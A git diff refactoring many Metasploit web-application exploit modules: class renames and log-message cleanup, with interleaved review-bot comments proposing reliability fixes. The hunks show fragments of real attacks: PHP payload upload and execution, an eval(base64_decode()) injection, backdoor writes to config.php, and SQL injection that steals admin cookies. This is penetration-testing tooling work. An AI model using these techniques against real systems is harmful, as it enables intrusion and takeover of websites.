@@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{rhost}:#{rport}" payload_name = rand_text_alphanumeric(rand(10) + 5) + ".php" - print_status("#{peer} - Uploading payload [ #{payload_name} ]") + print_status("Uploading payload [ #{payload_name} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "admin_area", "charts", "ofc-library", "ofc_upload_image.php"), @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(payload_name) - print_status("#{peer} - Executing Payload [ #{uri}/admin_area/charts/tmp-upload-images/#{payload_name} ]" ) + print_status("Executing Payload [ #{uri}/admin_area/charts/tmp-upload-images/#{payload_name} ]" ) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "admin_area", "charts", "tmp-upload-images", payload_name) @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response, probably the exploit failed") + print_error("Unexpected response, probably the exploit failed") end end diff --git a/modules/exploits/unix/webapp/coppermine_piceditor.rb b/modules/exploits/unix/webapp/coppermine_piceditor.rb index 948a9108db..4d589b50b6 100644 --- a/modules/exploits/unix/webapp/coppermine_piceditor.rb +++ b/modules/exploits/unix/webapp/coppermine_piceditor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/datalife_preview_exec.rb b/modules/exploits/unix/webapp/datalife_preview_exec.rb index 10291ae9a6..603c96f61f 100644 --- a/modules/exploits/unix/webapp/datalife_preview_exec.rb +++ b/modules/exploits/unix/webapp/datalife_preview_exec.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Exploiting the preg_replace() to execute PHP code") + print_status("Exploiting the preg_replace() to execute PHP code") res = send_injection("#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//") end end diff --git a/modules/exploits/unix/webapp/dogfood_spell_exec.rb b/modules/exploits/unix/webapp/dogfood_spell_exec.rb index 7ae0f83833..cd39139bb4 100644 --- a/modules/exploits/unix/webapp/dogfood_spell_exec.rb +++ b/modules/exploits/unix/webapp/dogfood_spell_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/egallery_upload_exec.rb b/modules/exploits/unix/webapp/egallery_upload_exec.rb index a218ee92b0..bbbfdab839 100644 --- a/modules/exploits/unix/webapp/egallery_upload_exec.rb +++ b/modules/exploits/unix/webapp/egallery_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data << " ?>\r\n" post_data << "--#{boundary}--\r\n" - print_status("#{peer} - Sending PHP payload (#{payload_name})") + print_status("Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("#{uri}egallery/uploadify.php"), 
@@ -102,11 +102,11 @@ class Metasploit3 < Msf::Exploit::Remote # If the server returns 200 and the body contains our payload name, # we assume we uploaded the malicious file successfully if not res or res.code != 200 or res.body !~ /#{payload_name}/ - print_error("#{peer} - File wasn't uploaded, aborting!") + print_error("File wasn't uploaded, aborting!") return end - print_status("#{peer} - Executing PHP payload (#{payload_name})") + print_status("Executing PHP payload (#{payload_name})") # Execute our payload res = send_request_cgi({ 'method' => 'GET', @@ -116,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 - print_status("#{peer} - Server returned #{res.code.to_s}") + print_status("Server returned #{res.code.to_s}") end end diff --git a/modules/exploits/unix/webapp/flashchat_upload_exec.rb b/modules/exploits/unix/webapp/flashchat_upload_exec.rb index b4cb968c14..ed1b03f3f3 100644 --- a/modules/exploits/unix/webapp/flashchat_upload_exec.rb +++ b/modules/exploits/unix/webapp/flashchat_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri' => uri}) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version found: #{version}") + vprint_status("Version found: #{version}") if version =~ /6\.0\.(2|4|5|6|7|8)/ return Exploit::CheckCode::Appears 
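Review bot: The match `version =~ /6\.0\.(2|4|5|6|7|8)/` in the flashchat `check` hunk (`@@ -71,7`) is unanchored, so a string such as `6.0.20` or `16.0.4` also yields `CheckCode::Appears`. If `version` holds only the version number (its extraction is outside the hunk), anchoring it, e.g. `version =~ /\A6\.0\.[24-8]\z/`, keeps the check from flagging releases it was not written for. The same applies to `/2\.(9|10|11)\.0/` in freepbx_config_exec.rb and `/1\.1\.7/` in havalite_upload_exec.rb. hybridauth_install_php_exec.rb anchors its version match with `^`, where `\A` is Ruby's start-of-string anchor.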
@@ -132,14 +132,14 @@ class Metasploit3 < Msf::Exploit::Remote base = target_uri.path # upload - print_status("#{peer} - Uploading malicious file...") + print_status("Uploading malicious file...") fname = upload(base) # register the file to clean register_files_for_cleanup(fname) # exec - print_status("#{peer} - Executing #{fname}...") + print_status("Executing #{fname}...") exec(base, fname) end end diff --git a/modules/exploits/unix/webapp/foswiki_maketext.rb b/modules/exploits/unix/webapp/foswiki_maketext.rb index 0cb8ac52d9..297c2c987f 100644 --- a/modules/exploits/unix/webapp/foswiki_maketext.rb +++ b/modules/exploits/unix/webapp/foswiki_maketext.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/freepbx_config_exec.rb b/modules/exploits/unix/webapp/freepbx_config_exec.rb index 58afa2be55..ce9fec4a64 100644 --- a/modules/exploits/unix/webapp/freepbx_config_exec.rb +++ b/modules/exploits/unix/webapp/freepbx_config_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote def check - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version =~ /2\.(9|10|11)\.0/ return Exploit::CheckCode::Appears 
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit rand_data = rand_text_alpha_lower(rand(10) + 5) - print_status("#{peer} - Sending payload") + print_status("Sending payload") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "admin", "config.php"), @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response, exploit probably failed!") + print_error("Unexpected response, exploit probably failed!") end end diff --git a/modules/exploits/unix/webapp/generic_exec.rb b/modules/exploits/unix/webapp/generic_exec.rb index 2ae8d9d41a..d5969f2945 100644 --- a/modules/exploits/unix/webapp/generic_exec.rb +++ b/modules/exploits/unix/webapp/generic_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb b/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb index 5c2569966f..110a0ca5ec 100644 --- a/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb +++ b/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp @@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - Version #{version} found") + print_status("Version #{version} found") if Gem::Version.new(version) <= Gem::Version.new('3.1.2') return Exploit::CheckCode::Appears 
@@ -103,34 +103,34 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Authenticating...") + print_status("Authenticating...") res = send_request_auth if res && res.code == 302 - print_status("#{peer} - The authentication process is done successfully!") + print_status("The authentication process is done successfully!") else fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end - print_status("#{peer} - Extracting Cookies Information...") + print_status("Extracting Cookies Information...") cookie = res.get_cookies if cookie.blank? fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") payload_name = rand_text_alpha_lower(rand(10) + 5) + '.pht' res = send_request_upload(payload_name, cookie) if res && res.code == 200 && res.body && res.body.to_s =~ /Success! File location.*>.*#{target_uri.path.to_s}(.*)#{payload_name}</ upload_path = $1 - print_good("#{peer} - File uploaded to #{upload_path}") + print_good("File uploaded to #{upload_path}") register_file_for_cleanup(payload_name) else fail_with(Failure::Unknown, "#{peer} - Upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_raw({ 'uri' => normalize_uri(target_uri.path.to_s, upload_path, payload_name), 'method' => 'GET' diff --git a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb index bc505ad66f..97d0e53509 100644 --- a/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb +++ b/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer 
diff --git a/modules/exploits/unix/webapp/graphite_pickle_exec.rb b/modules/exploits/unix/webapp/graphite_pickle_exec.rb index 29ebbb1775..9cd39b23bd 100644 --- a/modules/exploits/unix/webapp/graphite_pickle_exec.rb +++ b/modules/exploits/unix/webapp/graphite_pickle_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb index 53b9e6911c..3be8d20512 100644 --- a/modules/exploits/unix/webapp/guestbook_ssi_exec.rb +++ b/modules/exploits/unix/webapp/guestbook_ssi_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/hastymail_exec.rb b/modules/exploits/unix/webapp/hastymail_exec.rb index 13ce643e2e..1d3a6013ee 100644 --- a/modules/exploits/unix/webapp/hastymail_exec.rb +++ b/modules/exploits/unix/webapp/hastymail_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote login if not @session_id or @session_id.empty? - vprint_error "#{peer} - Authentication failed" + vprint_error "Authentication failed" return Exploit::CheckCode::Unknown end @@ -104,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 303 @session_id = res.get_cookies - print_good "#{peer} - Authentication successful" + print_good "Authentication successful" end end 
@@ -113,15 +113,15 @@ class Metasploit3 < Msf::Exploit::Remote @uri << '/' if @uri[-1,1] != '/' @session_id = "" - print_status "#{peer} - Trying login" + print_status "Trying login" login if not @session_id or @session_id.empty? - print_error "#{peer} - Authentication failed" + print_error "Authentication failed" return end - print_status "#{peer} - Authentication successfully, trying to exploit" + print_status "Authentication successfully, trying to exploit" data = "rs=passthru&" data << "rsargs[]=#{rand_text_alpha(rand(4) + 4)}&" @@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 or not res.body =~ /\+/ - print_error "#{peer} - Exploitation failed" + print_error "Exploitation failed" return end diff --git a/modules/exploits/unix/webapp/havalite_upload_exec.rb b/modules/exploits/unix/webapp/havalite_upload_exec.rb index 311d36732b..f74529955c 100644 --- a/modules/exploits/unix/webapp/havalite_upload_exec.rb +++ b/modules/exploits/unix/webapp/havalite_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri' => uri}) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || '' if not version.empty? and version =~ /1\.1\.7/ - vprint_status("#{peer} - Version found: #{version}") + vprint_status("Version found: #{version}") return Exploit::CheckCode::Appears end 
@@ -124,10 +124,10 @@ class Metasploit3 < Msf::Exploit::Remote def exploit base = target_uri.path - print_status("#{peer} - Uploading malicious file...") + print_status("Uploading malicious file...") fname = upload(base) - print_status("#{peer} - Executing #{fname}...") + print_status("Executing #{fname}...") exec(base, fname) end end diff --git a/modules/exploits/unix/webapp/horde_unserialize_exec.rb b/modules/exploits/unix/webapp/horde_unserialize_exec.rb index 92437ae125..cb51feb8a5 100644 --- a/modules/exploits/unix/webapp/horde_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/horde_unserialize_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -61,12 +61,12 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Testing injection...") + print_status("Testing injection...") unless check == Exploit::CheckCode::Vulnerable fail_with(Failure::NotVulnerable, "#{peer} - Target isn't vulnerable, exiting...") end - print_status("#{peer} - Exploiting the unserialize()...") + print_status("Exploiting the unserialize()...") send_request_exploit(payload.encoded) end diff --git a/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb b/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb index 2ca9e0026e..1932c444a3 100644 --- a/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb +++ b/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # application config.php is overwritten include Msf::Exploit::Remote::HttpClient 
@@ -61,19 +61,19 @@ class Metasploit3 < Msf::Exploit::Remote def check res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php') if !res - vprint_error "#{peer} - Connection failed" + vprint_error "Connection failed" return Exploit::CheckCode::Unknown elsif res.code == 404 - vprint_error "#{peer} - Could not find install.php" + vprint_error "Could not find install.php" elsif res.body =~ />([^<]+)<\/span> must be <b >WRITABLE</ - vprint_error "#{peer} - #{$1} is not writable" + vprint_error "#{$1} is not writable" elsif res.body =~ />HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</ version = res.body.scan(/>HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</).first.first - vprint_status "#{peer} - Found version: #{version}" + vprint_status "Found version: #{version}" if version =~ /^2\.(0\.(9|10|11)|1\.[\d]+|2\.[012])/ return Exploit::CheckCode::Vulnerable else - vprint_error "#{peer} - HybridAuth version #{version} is not vulnerable" + vprint_error "HybridAuth version #{version} is not vulnerable" end end Exploit::CheckCode::Safe @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote end # write backdoor - print_status "#{peer} - Writing backdoor to config.php" + print_status "Writing backdoor to config.php" payload_param = rand(1000) res = send_request_cgi( 'method' => 'POST', 
@@ -99,40 +99,40 @@ class Metasploit3 < Msf::Exploit::Remote if !res fail_with Failure::Unknown, "#{peer} - Connection failed" elsif res.body =~ /Installation completed/ - print_good "#{peer} - Wrote backdoor successfully" + print_good "Wrote backdoor successfully" else fail_with Failure::UnexpectedReply, "#{peer} - Coud not write backdoor to 'config.php'" end # execute payload code = Rex::Text.encode_base64(payload.encoded) - print_status "#{peer} - Sending payload to config.php backdoor (#{code.length} bytes)" + print_status "Sending payload to config.php backdoor (#{code.length} bytes)" res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'config.php'), 'data' => "#{payload_param}=#{code}" }, 5) if !res - print_warning "#{peer} - No response" + print_warning "No response" elsif res.code == 404 fail_with Failure::NotFound, "#{peer} - Could not find config.php" elsif res.code == 200 || res.code == 500 - print_good "#{peer} - Sent payload successfully" + print_good "Sent payload successfully" end # remove backdoor - print_status "#{peer} - Removing backdoor from config.php" + print_status "Removing backdoor from config.php" res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'install.php'), 'data' => 'OPENID_ADAPTER_STATUS=' ) if !res - print_error "#{peer} - Connection failed" + print_error "Connection failed" elsif res.body =~ /Installation completed/ - print_good "#{peer} - Removed backdoor successfully" + print_good "Removed backdoor successfully" else - print_warning "#{peer} - Could not remove payload from config.php" + print_warning "Could not remove payload from config.php" end end end diff --git a/modules/exploits/unix/webapp/instantcms_exec.rb b/modules/exploits/unix/webapp/instantcms_exec.rb index 0fb2359c31..593e52d53b 100644 --- a/modules/exploits/unix/webapp/instantcms_exec.rb +++ b/modules/exploits/unix/webapp/instantcms_exec.rb 
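Review bot: In the `# execute payload` step of this hybridauth hunk, `fail_with Failure::NotFound, ...` on a 404 raises before the `# remove backdoor` request that follows, so on that path the rewritten `config.php` is left in place on the tested host. Reporting the 404 with `print_error` and letting the method continue, or moving the removal request into an `ensure`, would make the cleanup unconditional. The message `"#{peer} - Coud not write backdoor to 'config.php'"` in the same hunk has a typo (`Could`). The method begins above the hunk, so the `ensure` placement needs checking against the full body.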
@@ -1,7 +1,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb index 8544567488..c684cd70a8 100644 --- a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote end def cookie_prefix - print_status("#{peer} - Checking for cookie prefix") + print_status("Checking for cookie prefix") cookie_prefix = "" res = send_request_cgi( { @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.get_cookies =~ /(.+)session/ - print_status("#{peer} - Cookie prefix #{$1} found") + print_status("Cookie prefix #{$1} found") cookie_prefix = $1 end return cookie_prefix @@ -104,11 +104,11 @@ class Metasploit3 < Msf::Exploit::Remote if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") begin - print_warning("#{peer} - Deleting #{@upload_php}") + print_warning("Deleting #{@upload_php}") client.fs.file.rm(@upload_php) - print_good("#{peer} - #{@upload_php} removed to stay ninja") + print_good("#{@upload_php} removed to stay ninja") rescue - print_error("#{peer} - Unable to remove #{f}") + print_error("Unable to remove #{f}") end end end 
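Review bot: The `rescue` branch in the invision_pboard cleanup hunk (`@@ -104,11`) interpolates `#{f}` in `print_error("Unable to remove #{f}")`, but no `f` is defined in the lines shown; the file being removed is `@upload_php`. Unless `f` is assigned in the part of the method above the hunk, a failed `rm` would raise `NameError` from inside the handler instead of printing the message. The line would read `print_error("Unable to remove #{@upload_php}")`. The bare `rescue` also hides which error occurred; rescuing into a variable and printing its message would make a leftover file easier to diagnose.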
@@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote db_driver_mysql = "a:1:{i:0;O:15:\"db_driver_mysql\":1:{s:3:\"obj\";a:2:{s:13:\"use_debug_log\";i:1;s:9:\"debug_log\";s:#{"cache/#{@upload_php}".length}:\"cache/#{@upload_php}\";}}}" - print_status("#{peer} - Exploiting the unserialize() to upload PHP code") + print_status("Exploiting the unserialize() to upload PHP code") res = send_request_cgi( { @@ -139,16 +139,16 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 - print_error("#{peer} - Exploit failed: #{res.code}") + print_error("Exploit failed: #{res.code}") return end - print_status("#{peer} - Executing the payload #{@upload_php}") + print_status("Executing the payload #{@upload_php}") res = send_request_raw({'uri' => "#{base}cache/#{@upload_php}"}) if res - print_error("#{peer} - Payload execution failed: #{res.code}") + print_error("Payload execution failed: #{res.code}") return end diff --git a/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb b/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb index 4319647596..7fd532a986 100644 --- a/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb +++ b/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/zip' require 'json' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote @zip = zip_file.pack # First step: call restore to run _prepare() and get an initialized AKFactory - print_status("#{peer} - Sending PHP serialized object...") + print_status("Sending PHP serialized object...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'), 'vars_get' => { 
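Review bot: `print_error("Exploit failed: #{res.code}")` in the `@@ -139,16` hunk runs under `if not res or res.code != 200`, so when no response arrives and `res` is `nil` the message itself raises `NoMethodError` instead of reporting the failure. Guard the interpolation, e.g. `print_error("Exploit failed: #{res ? res.code : 'no response'}")`. The method begins above the hunk.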
@@ -104,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote prepared_factory = Rex::Text.decode_base64(b64encoded_prepared_factory) modified_factory = prepared_factory.gsub('currentPartNumber";i:0', 'currentPartNumber";i:-1') - print_status("#{peer} - Sending initialized and modified AKFactory...") + print_status("Sending initialized and modified AKFactory...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'), 'vars_get' => { @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(php_filename) - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', php_filename) }, 2) diff --git a/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb b/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb index af1204f917..f36e78b209 100644 --- a/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb +++ b/modules/exploits/unix/webapp/joomla_comjce_imgmanager.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb b/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb index fa6e5d8723..ab54eecfc5 100644 --- a/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb +++ b/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient 
@@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 500 && res.body =~ /`(.*)_ucm_history`/ table_prefix = $1 - print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]") + print_status("Retrieved table prefix [ #{table_prefix} ]") else fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix") end @@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 500 && res.body =~ /Duplicate entry '([a-z0-9]+)' for key/ auth_cookie_part = $1[0...-1] - print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]") + print_status("Retrieved admin cookie [ #{auth_cookie_part} ]") else fail_with(Failure::Unknown, "#{peer}: No logged-in admin user found!") end @@ -131,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/ cookie_begin = $1 - print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]") + print_status("Retrieved unauthenticated cookie [ #{cookie_begin} ]") else fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie") end @@ -150,7 +150,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 && res.body =~ /Administration - Control Panel/ - print_status("#{peer} - Successfully authenticated as Administrator") + print_status("Successfully authenticated as Administrator") else fail_with(Failure::Unknown, "#{peer} - Session failure") end @@ -178,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Remote filename = rand_text_alphanumeric(rand(10)+6) # Create file - print_status("#{peer} - Creating file [ #{filename}.php ]") + print_status("Creating file [ #{filename}.php ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), 
@@ -198,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote # Grab token if res && res.code == 303 && res.headers['Location'] location = res.headers['Location'] - print_status("#{peer} - Following redirect to [ #{location} ]") + print_status("Following redirect to [ #{location} ]") res = send_request_cgi( 'uri' => location, 'method' => 'GET', @@ -208,14 +208,14 @@ class Metasploit3 < Msf::Exploit::Remote # Retrieving template token if res && res.code == 200 && res.body =~ /&([a-z0-9]+)=1\">/ token = $1 - print_status("#{peer} - Token [ #{token} ] retrieved") + print_status("Token [ #{token} ] retrieved") else fail_with(Failure::Unknown, "#{peer} - Retrieving token failed") end if res && res.code == 200 && res.body =~ /(\/templates\/.*\/)template_preview.png/ template_path = $1 - print_status("#{peer} - Template path [ #{template_path} ] retrieved") + print_status("Template path [ #{template_path} ] retrieved") else fail_with(Failure::Unknown, "#{peer} - Unable to retrieve template path") end @@ -227,7 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote filename_base64 = Rex::Text.encode_base64("/#{filename}.php") # Inject payload data into file - print_status("#{peer} - Insert payload into file [ #{filename}.php ]") + print_status("Insert payload into file [ #{filename}.php ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), 
@@ -248,14 +248,14 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 303 && res.headers['Location'] =~ /\/administrator\/index.php\?option=com_templates&view=template&id=#{template_id}&file=/ - print_status("#{peer} - Payload data inserted into [ #{filename}.php ]") + print_status("Payload data inserted into [ #{filename}.php ]") else fail_with(Failure::Unknown, "#{peer} - Could not insert payload into file [ #{filename}.php ]") end # Request payload register_files_for_cleanup("#{filename}.php") - print_status("#{peer} - Executing payload") + print_status("Executing payload") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, template_path, "#{filename}.php"), diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb index cad27d9654..1e7eb42741 100644 --- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb +++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -70,10 +70,10 @@ class Metasploit3 < Msf::Exploit::Remote if res and (res.code == 200 or res.code == 302) if res.body =~ /You are not authorised to view this resource/ - vprint_status("#{peer} - Joomla Media Manager Found but authentication 